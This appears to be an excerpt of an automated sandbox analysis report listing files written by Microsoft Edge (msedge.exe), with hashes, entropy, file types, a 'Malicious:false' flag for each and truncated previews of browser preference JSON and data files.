                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44137
                                                                                                                                                                            Entropy (8bit):6.090763122628254
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+Rtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEI6Itbz8hu3VlXr4CRo1
                                                                                                                                                                            MD5:1224276924C16B21AE4A5A8C359F79A8
                                                                                                                                                                            SHA1:786C00A83BF4C3073107F26469629631522CA44D
                                                                                                                                                                            SHA-256:A5F1AD9802223ACED682714520DDC11A18BD19DB46E49395431A111FEA390E94
                                                                                                                                                                            SHA-512:0F3A537BB56F2391811650EA45A87CB997D1D72C734E50BB15F5E8248BDD00CB92E95EE60F1FA045DC73691E74AF8DA773417505B898E09B8792F0E1BABFD352
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44137
                                                                                                                                                                            Entropy (8bit):6.090763122628254
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+Rtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEI6Itbz8hu3VlXr4CRo1
                                                                                                                                                                            MD5:1224276924C16B21AE4A5A8C359F79A8
                                                                                                                                                                            SHA1:786C00A83BF4C3073107F26469629631522CA44D
                                                                                                                                                                            SHA-256:A5F1AD9802223ACED682714520DDC11A18BD19DB46E49395431A111FEA390E94
                                                                                                                                                                            SHA-512:0F3A537BB56F2391811650EA45A87CB997D1D72C734E50BB15F5E8248BDD00CB92E95EE60F1FA045DC73691E74AF8DA773417505B898E09B8792F0E1BABFD352
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44137
                                                                                                                                                                            Entropy (8bit):6.090763122628254
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+Rtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEI6Itbz8hu3VlXr4CRo1
                                                                                                                                                                            MD5:1224276924C16B21AE4A5A8C359F79A8
                                                                                                                                                                            SHA1:786C00A83BF4C3073107F26469629631522CA44D
                                                                                                                                                                            SHA-256:A5F1AD9802223ACED682714520DDC11A18BD19DB46E49395431A111FEA390E94
                                                                                                                                                                            SHA-512:0F3A537BB56F2391811650EA45A87CB997D1D72C734E50BB15F5E8248BDD00CB92E95EE60F1FA045DC73691E74AF8DA773417505B898E09B8792F0E1BABFD352
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44137
                                                                                                                                                                            Entropy (8bit):6.090763122628254
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+Rtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEI6Itbz8hu3VlXr4CRo1
                                                                                                                                                                            MD5:1224276924C16B21AE4A5A8C359F79A8
                                                                                                                                                                            SHA1:786C00A83BF4C3073107F26469629631522CA44D
                                                                                                                                                                            SHA-256:A5F1AD9802223ACED682714520DDC11A18BD19DB46E49395431A111FEA390E94
                                                                                                                                                                            SHA-512:0F3A537BB56F2391811650EA45A87CB997D1D72C734E50BB15F5E8248BDD00CB92E95EE60F1FA045DC73691E74AF8DA773417505B898E09B8792F0E1BABFD352
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44137
                                                                                                                                                                            Entropy (8bit):6.090763122628254
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+Rtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEI6Itbz8hu3VlXr4CRo1
                                                                                                                                                                            MD5:1224276924C16B21AE4A5A8C359F79A8
                                                                                                                                                                            SHA1:786C00A83BF4C3073107F26469629631522CA44D
                                                                                                                                                                            SHA-256:A5F1AD9802223ACED682714520DDC11A18BD19DB46E49395431A111FEA390E94
                                                                                                                                                                            SHA-512:0F3A537BB56F2391811650EA45A87CB997D1D72C734E50BB15F5E8248BDD00CB92E95EE60F1FA045DC73691E74AF8DA773417505B898E09B8792F0E1BABFD352
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44137
                                                                                                                                                                            Entropy (8bit):6.090763122628254
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+Rtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEI6Itbz8hu3VlXr4CRo1
                                                                                                                                                                            MD5:1224276924C16B21AE4A5A8C359F79A8
                                                                                                                                                                            SHA1:786C00A83BF4C3073107F26469629631522CA44D
                                                                                                                                                                            SHA-256:A5F1AD9802223ACED682714520DDC11A18BD19DB46E49395431A111FEA390E94
                                                                                                                                                                            SHA-512:0F3A537BB56F2391811650EA45A87CB997D1D72C734E50BB15F5E8248BDD00CB92E95EE60F1FA045DC73691E74AF8DA773417505B898E09B8792F0E1BABFD352
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2036497
                                                                                                                                                                            Entropy (8bit):4.001538040150106
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:49152:xJr7WfjZRD6FFiWnUO5bdgUS4AueTVd0KdKn46Ww5vQvhZ8pkyBjJuIgwYKaZaDV:1
                                                                                                                                                                            MD5:56EDC69AC1FB214065C8B27ACB5BF313
                                                                                                                                                                            SHA1:0FC88D6A2FF6DBAA12BCF1C56C6DA6DBC7D32F87
                                                                                                                                                                            SHA-256:E92460AB2F9ADE0417B1C8DC113B84FA9A4F6DA9F48D4AC252FC7000F5DAD8F4
                                                                                                                                                                            SHA-512:A48D683967E10E82E92C3CA7A565188443DAA8F2FC85C196B77B786BCB2A39177DF053884E466D66F9A6BBEE0917AD1291A8715806F45B8D461F345C0DD37681
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.........| .*.|....|. ...|aaaaagfgdnjcdkncmfkfinnjaiapdblgaaaaaogokkamlflcoccdihncmbgcmflnaaaaaoipnhppjgickhnmdbgfbicakiamaaaaapdcjfaomkafnbpoclmfakjianjdaaaaapiecopgelmleoolpjapkgpglkcbaaaabcdhikdcpainmmjceakmkacogdkoaaaabdgnnajpalbdkkdnknbbbmndbilaaaaabfkbnfjnjldicllofdmjchdancccaaaabgphkbebbdbcibgbppdidkelfoigaaaabibhgjnbdelbcijfciclijhdkgohaaaabmldebjdieoplgdecloipkabiibcaaaaboojhahjgdjeknnemneiajjhhddiaaaabpccljmmhilhhndnjkobdedbpkjpaaaacmnkhlfjgehagffhnhdjfankefglaaaacnnimempmlomnnhdkimkfahjplfpaaaadbhonifkcheeddllhmpapnhcpgiaaaaadbkccgigjdmfmdhgikcckicldhjbaaaadbolalgmogecpogmlebfkpigmpdjaaaaehbfjkafkfgppkjageehakfakfbmaaaaehbppmedegafehiimempeifadcinaaaageoepbmnopkkfeadndbijdghellgaaaagfdmgcibcnlmgiipapnfocaocfneaaaagjojmcedjoignaljgmnihajfhhlpaaaaglldojfgdeaijnfefaggkfjekomeaaaaiihjniipljfegaknmbkneamnoajdaaaainjigbjlofcjekbnjnpiegecbnbaaaaaiognmpgbjoffachmpnnppfnokcbeaaaajcpbcbckoiafnblkdhnldokclbhiaaaajfoihhopfmnlhlnlhogjonmllocoaaaajhoimomebpcfopjpgkbbjdnldoihaaaakdafje
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2036497
                                                                                                                                                                            Entropy (8bit):4.001538040150106
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:49152:xJr7WfjZRD6FFiWnUO5bdgUS4AueTVd0KdKn46Ww5vQvhZ8pkyBjJuIgwYKaZaDV:1
                                                                                                                                                                            MD5:56EDC69AC1FB214065C8B27ACB5BF313
                                                                                                                                                                            SHA1:0FC88D6A2FF6DBAA12BCF1C56C6DA6DBC7D32F87
                                                                                                                                                                            SHA-256:E92460AB2F9ADE0417B1C8DC113B84FA9A4F6DA9F48D4AC252FC7000F5DAD8F4
                                                                                                                                                                            SHA-512:A48D683967E10E82E92C3CA7A565188443DAA8F2FC85C196B77B786BCB2A39177DF053884E466D66F9A6BBEE0917AD1291A8715806F45B8D461F345C0DD37681
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.........| .*.|....|. ...|aaaaagfgdnjcdkncmfkfinnjaiapdblgaaaaaogokkamlflcoccdihncmbgcmflnaaaaaoipnhppjgickhnmdbgfbicakiamaaaaapdcjfaomkafnbpoclmfakjianjdaaaaapiecopgelmleoolpjapkgpglkcbaaaabcdhikdcpainmmjceakmkacogdkoaaaabdgnnajpalbdkkdnknbbbmndbilaaaaabfkbnfjnjldicllofdmjchdancccaaaabgphkbebbdbcibgbppdidkelfoigaaaabibhgjnbdelbcijfciclijhdkgohaaaabmldebjdieoplgdecloipkabiibcaaaaboojhahjgdjeknnemneiajjhhddiaaaabpccljmmhilhhndnjkobdedbpkjpaaaacmnkhlfjgehagffhnhdjfankefglaaaacnnimempmlomnnhdkimkfahjplfpaaaadbhonifkcheeddllhmpapnhcpgiaaaaadbkccgigjdmfmdhgikcckicldhjbaaaadbolalgmogecpogmlebfkpigmpdjaaaaehbfjkafkfgppkjageehakfakfbmaaaaehbppmedegafehiimempeifadcinaaaageoepbmnopkkfeadndbijdghellgaaaagfdmgcibcnlmgiipapnfocaocfneaaaagjojmcedjoignaljgmnihajfhhlpaaaaglldojfgdeaijnfefaggkfjekomeaaaaiihjniipljfegaknmbkneamnoajdaaaainjigbjlofcjekbnjnpiegecbnbaaaaaiognmpgbjoffachmpnnppfnokcbeaaaajcpbcbckoiafnblkdhnldokclbhiaaaajfoihhopfmnlhlnlhogjonmllocoaaaajhoimomebpcfopjpgkbbjdnldoihaaaakdafje
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):86
                                                                                                                                                                            Entropy (8bit):4.3751917412896075
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                            MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                            SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                            SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                            SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44911
                                                                                                                                                                            Entropy (8bit):6.086423896790647
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:OMkbJrT8IeQc5dPSdFuUhDO6vP6Oe7t/zuhvsR3XDgh1+wbCAoTGoup1Xl3jVzXb:OMk1rT8H1qc6it/zVkh8wbRoThu3VlXb
                                                                                                                                                                            MD5:56F9967A2BC47E4D02F96269D8982E39
                                                                                                                                                                            SHA1:957B33A3A858A4DB1BCE7F2896FE95C268054E28
                                                                                                                                                                            SHA-256:1F792448FEA652A1581BDBE153C6493B2C7394B243867EC5B11A59B492BD8DC2
                                                                                                                                                                            SHA-512:30D0169CBBDD5AFD91706631FE5B0B15EF2932A52FBB42D557343AF552378755770DF9C262BDCE143EFE34655B1085E4C8E5E7E06DFD2D481E51E3CDFE69CBF8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg8mcY6CmCjTJCmtsWFOcUf5vj04cw0e1yZe2WAl8svFn5IC43jfc+dLnGrEyDwAicHCxNdhlrVa5LEtTgt5u2lAK02pd198r5dr5VYgHj55vViEOsF96z3F4ONrN2yeYHGQlo5wvtB8h5moYSz3q4XkgOLF68CtN9
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44656
                                                                                                                                                                            Entropy (8bit):6.09690858578357
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkBdwuUhDO6vP6OdodUYnMDVvsRncGoup1Xl3jVzXr2:z/Ps+wsI7yOET69odUachu3VlXr4CRo1
                                                                                                                                                                            MD5:F022AD6824D850ED804F4D706A6CE0C8
                                                                                                                                                                            SHA1:8F00920B447308C2FD000F76667E719100FCE94C
                                                                                                                                                                            SHA-256:E10CA710025C58BD2301F503EFFEB227F25452DF095F4E5842A61F21D32FFBEB
                                                                                                                                                                            SHA-512:8424A7ADF7B2F53A88B1F4FDBE198463C054F01309C1FB4C339EC62B1C601B9AE17E8F12F64BCFD8994E2A8F915630EE09B438B20FC795A60D40FD64F282F212
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
